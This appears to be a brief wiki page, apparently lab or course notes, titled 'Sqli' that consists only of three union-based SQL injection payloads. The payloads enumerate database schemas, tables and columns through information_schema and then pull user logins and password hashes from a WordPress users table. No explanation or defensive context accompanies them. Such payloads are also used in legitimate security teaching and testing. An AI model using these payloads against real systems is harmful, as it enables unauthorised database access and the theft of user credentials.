Sqli

From ICO wiki
Revision as of 15:36, 28 February 2013 by Mernits (talk | contribs) (Created page with '<pre> 1' union select TABLE_SCHEMA,TABLE_NAME from information_schema.tables; -- # 1' union select TABLE_NAME,COLUMN_NAME from information_schema.columns; -- # 1' union sel…')
(diff) ← Older revision | Latest revision (diff) | Newer revision → (diff)
Jump to navigationJump to search
1' union select TABLE_SCHEMA,TABLE_NAME  from information_schema.tables; -- # 

1' union select TABLE_NAME,COLUMN_NAME  from information_schema.columns; -- #


1' union select user_login,user_pass  from wp.wp_users; -- #

wp.wp_users